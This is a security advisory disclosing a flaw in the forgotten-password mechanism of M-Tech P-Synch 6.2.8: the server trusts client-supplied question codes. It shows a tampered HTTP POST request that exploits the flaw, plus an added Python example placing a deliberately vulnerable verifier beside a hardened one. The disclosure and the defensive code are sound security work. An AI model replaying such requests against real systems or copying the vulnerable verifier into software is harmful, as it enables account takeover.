Tried, Tested and Proven

Security Advisory 06 – 002 – Attacker may choose authentication questions in forgotten password mechanism

Vulnerable System:

M-Tech P-Synch Password Management Software

Version:

6.2.8

Other versions:

Unknown

Vulnerability discovery and development:

Portcullis Security Testing Services discovered this vulnerability.

Affected Systems:

The vulnerability was found and verified against a system running on a Windows 2000 platform.

Details:

We identified that the application fails to keep track of the questions it has asked the user who is trying to authenticate via the Forgotten Password mechanism.

By design, the application chooses 3 questions from a predetermined pool and presents them to the user seeking to reset their password. Successfully answering these will permit the user to change their password.

It was noted that, in addition to the application failing to check that the supplied POST request corresponds to the questions presented to the user, it was possible to supply three instances of the same question and answer pair. Assuming that the presented answer is correct, the application authenticates the user successfully.

Under normal circumstances, answering the 3 questions presented by the application results in a POST request similar to this:

POST /nph-psf.exe HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.1.1/nph-psf.exe
Content-Type: application/x-www-form-urlencoded
Content-Length: 259

TRANSACTION=C_RESPONSE&SESSKEY=F3zP51t%3D%21qR%5CnvJl%3D%7E0N&LANG=en-us&CSS=docs%2Fen-us%2Fstyle.css&MODEXT=&_VALUE_0=answer1&_QUES_0=QD-42ae7b35-02484&_VALUE_1=answer2&_QUES_1=QD-42ae7be7-02504&_VALUE_2=answer3&_QUES_2=QD-43301276-02068&SUBMIT-QA.x=45&SUBMIT-QA.y=8

The above POST parameters may be freely modified by the use of an HTTP proxy, or by sending them as a GET request.

Of interest to the attacker are the _QUES_[012] and _VALUE_[012] parameters. Each question has a unique code associated with it, e.g. QD-43301276-02068 corresponds to the question "What was the name of your first line manager?". All of the codes are available to both authenticated and unauthenticated users by viewing the HTML source of any pages containing security questions.

e.g. <INPUT type=hidden name="_QUES_2" value="QD-43301276-02068">

It is possible to modify the request such that the malicious user provides the answer to questions of her choosing. Upon submitting the POST, the application fails to check that the supplied answers correspond to those questions presented to the user.

e.g.:

POST /nph-psf.exe HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.1.1/nph-psf.exe
Content-Type: application/x-www-form-urlencoded
Content-Length: 259

TRANSACTION=C_RESPONSE&SESSKEY=F3zP51t%3D%21qR%5CnvJl%3D%7E0N&LANG=en-us&CSS=docs%2Fen-us%2Fstyle.css&MODEXT=&_VALUE_0=2&_QUES_0=QD-42ae7b35-02484&_VALUE_1=1990&_QUES_1=QD-42ae7b65-01988&_VALUE_2=8&_QUES_2=QD-42ae7bc1-02504&SUBMIT-QA.x=45&SUBMIT-QA.y=8

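
The server-side check the advisory says is missing, as an added example that is not P-Synch code: the hardened handler accepts only the distinct question codes it recorded for this session, shown beside a trusting version with the flaw described above. The question pool, the code-to-question mapping (other than QD-43301276-02068), the stored answers and the session dict are assumptions.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed question pool using codes in the advisory's QD-... style; only the
# QD-43301276-02068 text comes from the advisory, the rest is assumed, and the
# stored answers are constructed sample data for one hypothetical account.
QUESTION_POOL = {
    "QD-42ae7b35-02484": "What is your shoe size?",
    "QD-42ae7b65-01988": "What year did you leave school?",
    "QD-42ae7bc1-02504": "What was your first car?",
    "QD-43301276-02068": "What was the name of your first line manager?",
}
USER_ANSWERS = {"QD-42ae7b35-02484": "8", "QD-42ae7b65-01988": "1990",
                "QD-42ae7bc1-02504": "mini", "QD-43301276-02068": "smith"}

def start_challenge(session, n=3):
    """Pick n distinct questions and record which ones were asked, server-side."""
    session["asked"] = secrets.SystemRandom().sample(sorted(QUESTION_POOL), n)
    return session["asked"]

def parse_response(body, n=3):
    """Pull the (_QUES_i, _VALUE_i) pairs out of a C_RESPONSE form body."""
    form = parse_qs(body, keep_blank_values=True)
    return [(form.get(f"_QUES_{i}", [""])[0], form.get(f"_VALUE_{i}", [""])[0])
            for i in range(n)]

def answers_match(pairs):
    ok = True
    for code, value in pairs:          # check every pair; no early exit
        expected = USER_ANSWERS.get(code)
        if expected is None:
            ok = False
            continue
        ok &= hmac.compare_digest(expected.lower().encode(),
                                  value.strip().lower().encode())
    return ok

def vulnerable_verify(session, body):
    """Trusts the _QUES_ codes in the POST, so the client picks (and may repeat) questions."""
    return answers_match(parse_response(body))

def hardened_verify(session, body):
    """Accepts only the exact set of distinct codes this session was asked, once."""
    asked = session.pop("asked", None)     # single use: a failed attempt re-asks
    pairs = parse_response(body)
    if asked is None or sorted(code for code, _ in pairs) != sorted(asked):
        return False
    return answers_match(pairs)
```
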
Impact:

A malicious internal user may be able to socially engineer the answers to a number of the application’s questions for a given user. Some of the questions in use in the tested implementation have answers that may easily be obtained by an attacker within the organisation, e.g. “What is your shoe size?”, “What year did you leave school?”. If the malicious user is able to obtain the answers to a small number of these questions, she may be able to log in as the target user and freely modify their password and other details.

Exploit:

None required

Vendor Status:

Notified via email 17 February 2006

Vendor Response:

This is a known issue with the initial release of P-Synch 6.2.8. It was resolved in a patch to 6.2.8 in June, 2005, and is not present in any subsequent versions of the product. All customers are entitled to the patch (and indeed to all minor and major version upgrades) at no cost. Normally customers are notified of issues such as this by their M-Tech account representative. Was this customer not notified? (M-Tech does not know who the customer in question is.) A compensating control that reduces but does not eliminate the severity of this issue is that most organizations use multiple question sets to authenticate users, and the vulnerability in question reduces the strength of individual question sets, but does not eliminate the need to authenticate with more than one.

Copyright:

Copyright © Portcullis Computer Security Limited 2006, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information.
It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.